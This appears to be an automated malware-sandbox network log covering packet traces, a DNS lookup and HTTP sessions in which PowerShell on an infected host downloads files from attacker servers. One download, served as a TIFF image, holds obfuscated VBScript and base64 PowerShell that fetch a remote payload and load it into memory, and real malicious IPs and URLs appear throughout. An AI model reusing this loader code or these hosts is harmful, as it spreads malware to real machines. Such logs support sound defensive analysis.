                                                                                                                Nov 15, 2024 18:15:51.452116013 CET805003094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:51.452173948 CET5003080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:51.457056046 CET805003094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:52.389782906 CET805003094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:52.389939070 CET5003080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:52.395416021 CET805003094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:52.395499945 CET5003080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:52.537261009 CET5003980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:52.542306900 CET805003994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:52.542402029 CET5003980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:52.545501947 CET5003980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:52.550590992 CET805003994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:52.550654888 CET5003980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:52.555526018 CET805003994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:53.531023026 CET805003994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:53.531119108 CET5003980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:53.536573887 CET805003994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:53.536644936 CET5003980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:53.667660952 CET5004480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:53.672853947 CET805004494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:53.672950029 CET5004480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:53.674910069 CET5004480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:53.681334019 CET805004494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:53.681411028 CET5004480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:53.688611031 CET805004494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:54.620743990 CET805004494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:54.620846033 CET5004480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:54.626383066 CET805004494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:54.626533031 CET5004480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:54.763283968 CET5004980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:54.768280983 CET805004994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:54.768385887 CET5004980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:54.773739100 CET5004980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:54.778541088 CET805004994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:54.778594017 CET5004980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:54.783451080 CET805004994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:55.777123928 CET805004994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:55.779442072 CET5004980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:55.785103083 CET805004994.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:55.785170078 CET5004980192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:55.929631948 CET5005480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:55.934623003 CET805005494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:55.934705973 CET5005480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:55.936876059 CET5005480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:55.941725969 CET805005494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:55.941776991 CET5005480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:55.946705103 CET805005494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:56.869158030 CET805005494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:56.869262934 CET5005480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:56.875612974 CET805005494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:56.875664949 CET5005480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:57.021110058 CET5006380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:57.026913881 CET805006394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:57.026994944 CET5006380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:57.029602051 CET5006380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:57.034526110 CET805006394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:57.034588099 CET5006380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:57.039397001 CET805006394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:58.000564098 CET805006394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:58.000787020 CET5006380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:58.012600899 CET805006394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:58.012686014 CET5006380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:58.135967970 CET5006880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:58.141138077 CET805006894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:58.141226053 CET5006880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:58.143311024 CET5006880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:58.148207903 CET805006894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:58.148279905 CET5006880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:58.153141022 CET805006894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:59.147363901 CET805006894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:59.147535086 CET5006880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:59.152769089 CET805006894.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:59.152832031 CET5006880192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:59.310003996 CET5007380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:59.314872980 CET805007394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:59.314955950 CET5007380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:59.317055941 CET5007380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:59.321930885 CET805007394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:15:59.321995974 CET5007380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:15:59.326833010 CET805007394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:00.269982100 CET805007394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:00.270107031 CET5007380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:00.275401115 CET805007394.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:00.275469065 CET5007380192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:00.420578003 CET5008080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:00.425457954 CET805008094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:00.425563097 CET5008080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:00.427676916 CET5008080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:00.432533979 CET805008094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:00.432593107 CET5008080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:00.437413931 CET805008094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:01.382997036 CET805008094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:01.383166075 CET5008080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:01.388475895 CET805008094.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:01.388547897 CET5008080192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:01.537725925 CET5008480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:01.542752028 CET805008494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:01.542829990 CET5008480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:01.544954062 CET5008480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:01.549794912 CET805008494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:01.549900055 CET5008480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:01.554800034 CET805008494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:02.497056961 CET805008494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:02.497178078 CET5008480192.168.2.494.156.177.95
                                                                                                                Nov 15, 2024 18:16:02.503490925 CET805008494.156.177.95192.168.2.4
                                                                                                                Nov 15, 2024 18:16:02.503554106 CET5008480192.168.2.494.156.177.95
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Nov 15, 2024 18:14:11.375248909 CET5408953192.168.2.41.1.1.1
                                                                                                                Nov 15, 2024 18:14:11.387165070 CET53540891.1.1.1192.168.2.4
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Nov 15, 2024 18:14:11.375248909 CET192.168.2.41.1.1.10xcc5aStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Nov 15, 2024 18:14:11.387165070 CET1.1.1.1192.168.2.40xcc5aNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Nov 15, 2024 18:14:11.387165070 CET1.1.1.1192.168.2.40xcc5aNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                                                                • 1017.filemail.com
                                                                                                                • 192.3.243.136
                                                                                                                • 94.156.177.95
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.449730192.3.243.136806884C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:05.634198904 CET334OUTGET /33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF HTTP/1.1
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                Host: 192.3.243.136
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 15, 2024 18:14:06.301994085 CET1236INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 15 Nov 2024 17:14:05 GMT
                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                Last-Modified: Fri, 15 Nov 2024 07:22:13 GMT
                                                                                                                ETag: "23014-626ee6d0c971b"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 143380
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: image/tiff
                                                                                                                Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 46 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 73 00 6f 00 6e 00 61 00 6e 00 74 00 65 00 28 00 42 00 79 00 56 00 61 00 6c 00 20 00 70 00 69 00 6f 00 63 00 61 00 6d 00 65 00 63 00 72 00 61 00 6e 00 73 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 78 00 61 00 6e 00 74 00 65 00 6c 00 6f 00 6d 00 61 00 2c 00 20 00 42 00 79 00 56 00 61 00 6c 00 20 00 72 00 65 00 63 00 61 00 74 00 61 00 64 00 61 00 6d 00 65 00 6e 00 74 00 65 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 69 00 6d 00 20 00 70 00 69 00 72 00 6f 00 73 00 65 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 69 00 72 00 6f 00 73 00 65 00 20 00 3d 00 20 00 49 00 6e 00 53 00 74 00 72 00 28 00 70 00 69 00 6f 00 63 00 61 00 6d 00 65 00 63 00 72 00 61 00 6e 00 73 00 2c 00 20 00 78 00 61 00 6e 00 74 00 65 00 6c 00 6f 00 6d 00 61 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 44 00 6f 00 20 00 57 00 68 00 69 00 6c 00 65 00 20 00 70 00 69 00 72 00 6f 00 73 00 65 00 20 00 3e 00 [TRUNCATED]
                                                                                                                Data Ascii: Function sonante(ByVal piocamecrans, ByVal xanteloma, ByVal recatadamente) Dim pirose pirose = InStr(piocamecrans, xanteloma) Do While pirose > 0 piocamecrans = Left(piocamecrans, pirose - 1) & recatadamente & Mid(piocamecrans, pirose + Len(xanteloma)) pirose = InStr(pirose + Len(recatadamente), piocamecrans, xanteloma) Loop sonante = piocamecransEnd Functionprivate function ReadStdIn()
                                                                                                                Nov 15, 2024 18:14:06.302083015 CET1236INData Raw: 00 20 00 20 00 77 00 68 00 69 00 6c 00 65 00 20 00 4e 00 6f 00 74 00 20 00 73 00 74 00 64 00 49 00 6e 00 2e 00 41 00 74 00 45 00 6e 00 64 00 4f 00 66 00 53 00 74 00 72 00 65 00 61 00 6d 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20
                                                                                                                Data Ascii: while Not stdIn.AtEndOfStream ReadStdIn = ReadStdIn & stdIn.ReadAll wendend functionIf Not mangan
                                                                                                                Nov 15, 2024 18:14:06.302144051 CET1236INData Raw: 00 50 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 00 53 00 42 00 4f 00 5a 00 58 00 63 00 74 00 54 00 32 00 4a 00 71 00 5a 00 57 00 4e 00 30 00 49 00 46 00 4e 00 35 00 63 00 79 00 63 00 72 00 4a 00 33
                                                                                                                Data Ascii: PJLACVWQNFKGXDEPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGJLACVWQNFKGXDEPltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQ
                                                                                                                Nov 15, 2024 18:14:06.302314997 CET636INData Raw: 00 4a 00 79 00 73 00 6e 00 59 00 57 00 63 00 70 00 4f 00 7a 00 4e 00 61 00 52 00 48 00 4e 00 30 00 59 00 58 00 4a 00 30 00 53 00 57 00 35 00 6b 00 5a 00 58 00 67 00 67 00 4c 00 57 00 64 00 6c 00 49 00 44 00 41 00 67 00 4c 00 57 00 46 00 75 00 5a
                                                                                                                Data Ascii: JysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJLACVWQNFKGXDEPJbmRleC" asfaltaria = asfaltaria & "AtJLACVWQN
                                                                                                                Nov 15, 2024 18:14:06.302364111 CET1236INData Raw: 00 4e 00 45 00 4e 00 76 00 62 00 57 00 31 00 68 00 62 00 6d 00 51 00 67 00 50 00 53 00 41 00 7a 00 57 00 6b 00 52 00 70 00 62 00 57 00 46 00 6e 00 5a 00 56 00 52 00 6c 00 65 00 48 00 51 00 75 00 55 00 33 00 56 00 69 00 63 00 33 00 52 00 79 00 61
                                                                                                                Data Ascii: NENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaJLACVWQNFKGXDEPRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYJLACV
                                                                                                                Nov 15, 2024 18:14:06.302418947 CET1236INData Raw: 00 6d 00 62 00 47 00 55 00 6e 00 4b 00 79 00 64 00 6a 00 64 00 47 00 6c 00 76 00 62 00 69 00 35 00 42 00 63 00 33 00 4e 00 6c 00 62 00 57 00 4a 00 73 00 65 00 56 00 30 00 36 00 4f 00 6b 00 78 00 76 00 59 00 57 00 51 00 6f 00 4d 00 31 00 70 00 45
                                                                                                                Data Ascii: mbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJLACVWQNFKGXDEPJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ
                                                                                                                Nov 15, 2024 18:14:06.302470922 CET1236INData Raw: 00 55 00 6e 00 4b 00 79 00 64 00 68 00 4c 00 45 00 6c 00 31 00 59 00 57 00 52 00 6c 00 63 00 32 00 46 00 30 00 61 00 58 00 5a 00 68 00 5a 00 47 00 39 00 4a 00 64 00 53 00 63 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58
                                                                                                                Data Ascii: UnKydhLEl1YWRlc2F0aXZhZG9JdScJLACVWQNFKGXDEPrJ2EsSX" asfaltaria = asfaltaria & "VhJLACVWQNFKGXDEPZGVzYXRpdmFkb0l
                                                                                                                Nov 15, 2024 18:14:06.302521944 CET1236INData Raw: 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 00 64 00 69 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58
                                                                                                                Data Ascii: follipar & "JLACVWQNFKGXDEPdiJLACVWQNFKGXDEP" enfollipar = enfollipar & "gJLACVWQNFKGXDEPo JLACVWQNFKGXDEP"
                                                                                                                Nov 15, 2024 18:14:06.302995920 CET848INData Raw: 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 2e 00 4a 00 4c 00 41 00 43
                                                                                                                Data Ascii: enfollipar = enfollipar & ".JLACVWQNFKGXDEPTeJLACVWQNFKGXDEP" enfollipar = enfollipar & "xJLACVWQNFKGXD
                                                                                                                Nov 15, 2024 18:14:06.303050995 CET1236INData Raw: 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 46 00 38 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50
                                                                                                                Data Ascii: ollipar = enfollipar & "F8JLACVWQNFKGXDEP." enfollipar = enfollipar & "GeJLACVWQNFKGXDEPt" enfollipar =
                                                                                                                Nov 15, 2024 18:14:06.307126045 CET1236INData Raw: 00 69 00 70 00 61 00 72 00 20 00 3d 00 20 00 65 00 6e 00 66 00 6f 00 6c 00 6c 00 69 00 70 00 61 00 72 00 20 00 26 00 20 00 22 00 34 00 4a 00 4c 00 41 00 43 00 56 00 57 00 51 00 4e 00 46 00 4b 00 47 00 58 00 44 00 45 00 50 00 53 00 74 00 22 00 0d
                                                                                                                Data Ascii: ipar = enfollipar & "4JLACVWQNFKGXDEPSt" enfollipar = enfollipar & "rJLACVWQNFKGXDEPingJLACVWQNFKGXDEP($"


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.449738192.3.243.136805820C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Nov 15, 2024 18:14:26.465945005 CET75OUTGET /33/LOGLK.txt HTTP/1.1
                                                                                                                Host: 192.3.243.136
                                                                                                                Connection: Keep-Alive
                                                                                                                Nov 15, 2024 18:14:27.125089884 CET1236INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 15 Nov 2024 17:14:26 GMT
                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                Last-Modified: Fri, 15 Nov 2024 07:13:58 GMT
                                                                                                                ETag: "22aac-626ee4f8ac68f"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 141996
                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: text/plain
                                                                                                                Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125200033 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125272989 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125325918 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125375032 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125441074 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                Nov 15, 2024 18:14:27.125488997 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
